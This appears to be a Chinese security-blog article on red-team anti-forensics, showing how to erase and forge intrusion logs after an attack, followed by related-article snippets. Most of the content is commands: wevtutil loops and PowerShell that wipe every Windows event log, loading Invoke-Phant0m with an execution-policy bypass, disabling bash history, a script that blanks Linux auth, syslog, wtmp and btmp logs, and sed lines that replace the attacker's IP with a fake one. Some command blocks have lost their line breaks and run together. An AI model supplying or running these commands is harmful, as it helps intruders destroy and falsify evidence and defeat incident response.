<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    紅隊痕跡清理之入侵日志處理

    VSole2021-12-15 14:02:21

    聲明

    由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,雷神眾測及文章作者不為此承擔任何責任。

    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。

    前言

    在攻擊結束后,如何不留痕跡的清除日志和操作記錄,以掩蓋入侵蹤跡,這其實是一個細致的技術活。在藍隊的溯源中,攻擊者的攻擊路徑都將記錄在日志中,所遺留的工具也會被藍隊進行分析,在工具中可以查找特征,紅隊自研工具更容易留下蛛絲馬跡。你所做的每一個操作,都要被抹掉;你所上傳的工具,都應該被安全地刪掉,以防被溯源在演練中失分。

     Windows日志處理

    Windows事件日志不同EVENT ID代表的不同意義

    Windows日志管理工具wevtutil.exe

    wevtutil搭配for循環清除所有日志

    for /F "tokens=*" %a in ('wevtutil.exe el') DO wevtutil.exe cl "%a"
    

    Powershell批量刪日志

    wevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"}
    

    加載運行powershell腳本刪除日志

    powershell –exec bypass –Command "& {Import-Module 'C:\Invoke-Phant0m.ps1';Invoke-Phant0m}"github
    

    地址:https://github.com/gouduyao/Invoke-Phant0m

    Linux日志處理

    • Bash日志處理

    bash去掉history記錄,讓系統不記錄歷史操作命令(使用較少)

    export HISTSIZE=0export HISTFILE=/dev/null
    

    history命令的清除

    history -c  # 刪除內存中的所有命令歷史history -r  # 刪除當前會話歷史記錄
    
    • 系統日志

    一鍵清理日志bash腳本

    # !/usr/bin/bashecho > /var/log/syslogecho > /var/log/messagesecho > /var/log/httpd/access_logecho > /var/log/httpd/error_logecho > /var/log/xferlogecho > /var/log/secureecho > /var/log/auth.logecho > /var/log/user.logecho > /var/log/wtmpecho > /var/log/lastlogecho > /var/log/btmpecho > /var/run/utmprm ~/./bash_historyhistory -c
    

    使用sed偽造日志或定向刪除

    # 192.168.100.101為攻擊者IP,10.0.0.55為偽造IP,-i編輯文件sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/btmp*sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/lastlogsed 's/192.168.100.101/10.0.0.55/g' -i /var/log/wtmpsed 's/192.168.100.101/10.0.0.55/g' -i securesed 's/192.168.100.101/10.0.0.55/g' -i /var/log/utmp
    

    由于日志文件偏多這里建議如上編輯為bash腳本一鍵清理

    web日志同樣可以使用sed進行偽造,例如apache日志、MySQL日志、php日志

    sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/access.logsed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/error_log
    sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_error.logsed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_slow.log
    sed 's/192.168.100.101/192.168.1.4/g' –i /var/log/apache/php_error.log
    
    logvar
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    如何根據需求來調整 fluentd 配置。
    最近想要針對Shiro的利用工具擴展利用鏈,但自己完全寫一個工具即麻煩也沒有必要,因此想要通過SummerSec師傅開源的工具ShiroAttack2擴展來實現,既然要擴展首先就得了解項目的源碼實現。本片文章中我不會通篇的對這個項目代碼進行分析,只抽出幾個我認為的要點進行分析。
    本文記錄從零開始搭建F5 BIG-IP漏洞調試環境的細節。
    忽略/dist目錄,相對.gitignore文件所在目錄。本地.gitignore文件與其他開發人員共享,并且應包含對存儲庫的所有其他用戶有用的模式。輸出顯示gitignore文件的路徑,匹配行的編號和實際模式。
    Linux痕跡清除
    2022-01-21 13:42:53
    在滲透的過程中,我們會經常遇到linux。由于linux日志非常詳細而且方便查看,導致我們的操作記錄很 有可能會在管理員前面暴露無遺,所以這次主要跟大家分享一下在linux下面如何隱藏我們的登陸日志和 操作日志。按照客戶端的情況,大概分為兩種,一種linux,一種windows。 此處的服務端測試系統為CentOS 7.9。
    當我們遇到任意文件讀取漏洞的時候,我們需要考慮如何通過這一個小點去擴大我們的成果,達到最大化利用的目的。本篇文章主要介紹了一些在我們拿到任意文件讀取點后的深入利用姿勢,希望對大家能有所幫助。來源作者lxlxlx@深信服西部天威戰隊常見讀取的敏感文件路徑windowsC:\boot.ini //查看系統版本。當下次訪問相同計算機時,OpenSSH會核對公鑰。如果公鑰不同,OpenSSH會發出警告, 避免你受到DNS Hijack之類的攻擊。
    查命令絕對路徑: which用于查找并顯示給定命令的絕對路徑,環境變量中PATH參數也可以被查出來。
    與其他穿透工具不同的是:FastTunnel項目致力于打造一個易于擴展、易于維護的內網穿透框架,任何人都可以基于該框架二次開發,你可以直接通過nuget安裝依賴進行開發,當然它也是開箱即用的工具。
    1. 文件包含漏洞概念通過PHP函數引入文件時,傳入的文件名沒有經過合理的驗證,從而操作了預想之外的文件,就可能導致意外的文件泄漏甚至惡意代碼注入
    雖然網上有大量從零搭建?的文章,但大都針對老版本,若直接照搬去安裝最新的?版本會遇到一堆問題。故此將我的安裝步驟記錄下來,希望能為讀者提供?式的集群搭建幫助。服務等,可供用戶免費下載、使用和分享。??啟動的三節點服務已經配置好了以下使用?節點進行演示查看,其他節點操作均一致#?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类